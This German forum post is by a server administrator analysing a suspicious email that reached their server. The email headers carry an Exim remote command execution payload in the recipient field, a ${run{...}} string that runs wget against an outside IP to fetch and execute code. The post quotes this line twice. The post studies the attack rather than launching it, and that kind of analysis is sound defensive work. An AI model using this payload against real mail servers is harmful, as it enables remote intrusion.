Gerade ist eine vermutlich an root@localhost gerichtete E-Mail auf einem von mir betreuten Server eingegangen, die aus folgendem Quelltext besteht:
header:
01: Return-Path: <support [at] service.com>
02: Delivered-To: ???@???.de
03: Received: by ???.de (Postfix)
04: ID: [ID filtered]
05: Delivered-To:
06: root+${run{x2fbinx2fsht-ctx22wgetx20213.227.155.101x2ftmpx2f[IP-Adresse des angegriffenen
07: Servers]x22}}@localhost
08: Received: from service.com (unknown [46.101.19.140])
09: by ???.de (Postfix) with SMTP ID: [ID filtered]
10: Tue, 18 Jun 2019 xx:xx:xx +0200 (CEST)
11: Received: 1
12: Received: 2
13: Received: 3
14: Received: 4
15: Received: 5
16: Received: 6
17: Received: 7
18: Received: 8
19: Received: 9
20: Received: 10
21: Received: 11
22: Received: 12
23: Received: 13
24: Received: 14
25: Received: 15
26: Received: 16
27: Received: 17
28: Received: 18
29: Received: 19
30: Received: 20
31: Received: 21
32: Received: 22
33: Received: 23
34: Received: 24
35: Received: 25
36: Received: 26
37: Received: 27
38: Received: 28
39: Received: 29
40: Received: 30
41: Received: 31
Interessant ist vor allem dieser Code:
Code:
root+${run{x2fbinx2fsht-ctx22wgetx20213.227.155.101x2ftmpx2f[IP-Adresse des angegriffenen Servers]x22}}@localhost
Es soll offenbar von whois:
[Link nur für registrierte Mitglieder sichtbar. ] etwas nachgeladen und dann ausgeführt werden.
Der Exploit ist wohl für den Mailserver Exim vorgesehen (bei uns ist der nicht im Einsatz), wenn ich die Google-Ergebnisse richtig deute (Suche nach x2fbinx2fsht). Es könnte sich um das Ausnutzen
[Link nur für registrierte Mitglieder sichtbar. ] handeln.
Lesezeichen